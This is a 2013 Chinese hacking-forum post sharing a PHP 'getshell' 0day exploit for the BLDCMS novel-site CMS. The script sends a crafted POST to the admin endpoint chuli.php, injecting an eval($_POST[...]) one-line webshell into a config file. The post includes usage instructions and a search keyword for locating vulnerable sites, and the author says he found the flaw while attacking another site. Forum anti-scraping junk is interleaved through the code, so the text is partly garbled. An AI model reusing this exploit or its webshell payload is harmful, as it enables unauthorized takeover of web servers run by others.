找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2322|回复: 0
打印 上一主题 下一主题

BLDCMS(白老大小说) Getshell 0day EXP

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-26 20:49:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
之前想搞一个黑阔站 发现旁站有一个站用了BLDCMS 我就下载看了.. 找到了一个getshell漏洞* M& j% y6 _8 ]: S2 g$ N

# ^7 T; ~, x: [9 g7 W8 V 2 n$ U9 I( ^  t( j5 `
话说昨晚晴天小铸在90sec发现有人把这getshell漏洞的分析发出来了 擦 居然被人先发了
0 G7 p5 _- H: {7 b  Y& Z8 t' I. ~ ( ^3 ^: @8 a) a7 {- L
既然都有人发了 我就把我之前写好的EXP放出来吧+ x! T; _  G; Q4 q+ g

1 P  \0 {( o. O' F: @0 yview source print?01.php;">
  }8 t" q: v1 U: A9 h1 h02.<!--?php. H! R8 y- j4 K5 P# ^: ?+ K& V; P
03.echo "-------------------------------------------------------------------
4 C. r, @0 u; B! K5 {5 f/ x$ Z04.
: F3 X2 L8 E9 x. j05.------------\r\n              BLDCMS(白老大php小说小偷) GETSHELL 0DAY EXP
' G* l* V% I# r) y0 i) k) o06. 8 R1 E/ P2 T( c1 l$ K) C
07.(GPC=Off)\r\n            Vulnerability discovery&Code by 数据流@wooyun
7 Z5 r8 p: B5 Q* W08. 6 v& t( k# a/ V+ n# p1 N
09.QQ:981009941\r\n                                2013.3.21\r\n            
; u6 z* l2 j. Z8 K- n  H# E& h10. 1 F& {/ V$ B! Z" N: u9 I
11. 0 H. S6 _' A6 ^) C
12.用法:php.exe EXP.php www.baidu.com /cms/ pass(一句话密码
6 K' d% U+ S/ k# @6 a13. . C  ]6 v: l; ]  U
14.)\r\n                    搜索关键字:\"开发者: 白老大小说\"\r\n-----------, V" Z% t! l2 W, k8 ^& |/ E$ h# ]
15.
1 D0 [8 r/ n" T  F16.--------------------------------------------------------------------\r\n";( q( \  I2 M+ k8 l3 X
17.$url=$argv[1];+ x' w" y+ U# s2 w' C
18.$dir=$argv[2];
0 P2 l( l8 |' u4 j19.$pass=$argv[3];, T& ^( a! Z2 }2 z# O7 _# H
20.$eval='\';eval($_POST['.'"'.$pass.'"'.']);\'';6 h; {" y: d  H6 ~- P8 f" p
21.if (emptyempty($pass)||emptyempty($url))
# ^! v$ C1 N6 ^# o/ i3 r; C22.{exit("请输入参数");}
# v( l5 ~# ^# i23.else
3 B, ?0 F0 O; r2 e& T4 Y24.{
' I0 C7 m" |; K& C6 E" _8 M9 O25.$fuckdata='sitename=a&qq=1&getcontent=acurl&tongji=a&cmsmd5=1&sqlite='.$ev
& E) g! G$ Y5 ]3 J2 u26.
' r' ]- V2 X1 E. m: T27.al;
: E5 F4 @, a  s: T( G$ u& E' R28.$length = strlen($fuckdata);
' J3 ?: t9 U$ l7 l8 d) p0 F29.function getshell($url,$pass). z+ O) x! ~6 D! ]$ S9 v  f
30.{
! j* o  q2 o: M; n31.global $url,$dir,$pass,$eval,$length,$fuckdata;
2 L" M- k, z0 f1 g32.$header = "OST /admin/chuli.php?action=a_1 HTTP/1.1\r\n";! d% I+ [& m& }4 n. g; d& Q+ m% L
33.$header .= "Content-Type: application/x-www-form-urlencoded\r\n";1 l- A: f5 L, B6 w/ Z# t: Z' e7 G5 H
34.$header .= "User-Agent: MSIE\r\n";8 X1 p, ^9 C# g
35.$header .= "Host:".$url."\r\n";
7 Z5 l+ z7 ?! ?# [/ Q' T36.$header .= "Content-Length: ".$length."\r\n";
0 R) `6 v; w7 @+ \$ M  n, g* o37.$header .= "Connection: Close\r\n";: j  N- j2 ?! x7 H* u
38.$header .="\r\n";
; ?. \: J& m3 E6 p4 I6 m39.$header .= $fuckdata."\r\n\r\n";0 f5 B) E8 W, ?
40.$fp = fsockopen($url, 80,$errno,$errstr,15);- X6 `% F+ h1 A
41.if (!$fp)
: ~: J  B/ a) h9 b1 E& o0 |42.{- s+ ~' ]2 f1 y/ M8 z+ G
43.exit ("利用失败:请检查指定目标是否能正常打开");
+ ?- `1 u  [& z& c( J: s; i  [44.}4 ~% F& F$ @/ x. O
45.else{ if (!fputs($fp,$header))
2 G  y7 L8 z/ J1 |( S. V46.{exit ("利用失败");}" ^9 n0 T3 B: a* U6 |; F
47.else
# v7 b2 M+ D: W: {+ c3 l48.{$ M; c8 H. B! Y
49.$receive = '';/ Q2 ~) p! b! k
50.while (!feof($fp)) {1 ^( L' }$ V3 j# d. J# d0 A
51.$receive .= @fgets($fp, 1000);7 ?+ Y  n9 a( Q6 J$ O: q  {
52.}4 ^8 v3 J2 @- I0 |
53.@fclose($fp);( c% O9 l8 b/ k- d! i
54.echo "$url/$dir/conn/config/normal2.php passpass(如连接失败 请检查目标8 Y7 s$ E! |7 u+ [% D( z7 n0 |, J
55.
/ D; Q3 b7 K7 Z. s% c' S: @56.GPC是否=off)";$ r4 @" F7 C9 W, n1 r* _/ W: p
57.}}8 M; V. ?+ U# s2 T4 Y# M9 @5 n) P
58.}$ A  N. r& T: k% R
59.}
2 y" x# N4 R4 E& E; }$ l% t7 I60.getshell($url,$pass);" B" r2 a7 }8 Y: t& Z+ V7 v
61.?-->
8 ]: E7 l7 x0 Q* q" v% ~
) |/ w8 J! _+ `- c2 k0 O9 G- x& k: q. a( ?1 Y5 d  \; z

; i/ W6 E( q$ T% bby 数据流( P* I. r* ^$ _) w$ V
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表